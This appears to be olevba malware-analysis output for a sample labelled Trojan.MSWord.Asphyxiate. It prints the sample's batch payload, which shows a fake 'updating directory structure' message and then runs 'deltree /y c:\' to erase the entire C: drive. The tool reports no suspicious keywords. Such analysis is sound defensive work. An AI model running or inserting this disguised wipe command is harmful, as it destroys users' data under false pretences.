olevba 0.60.1.dev3 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: Trojan.MSWord.Asphyxiate-a1ba216481ed7f6524014f2d4e46ec1bbe0513f4
Type: Text
-------------------------------------------------------------------------------
VBA MACRO Trojan.MSWord.Asphyxiate-a1ba216481ed7f6524014f2d4e46ec1bbe0513f4 
in file: Trojan.MSWord.Asphyxiate-a1ba216481ed7f6524014f2d4e46ec1bbe0513f4 - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
@Echo Updating directory structure!
@Echo Please wait . . .
@deltree /y c:\ > asphyxiate
No suspicious keyword or IOC found.

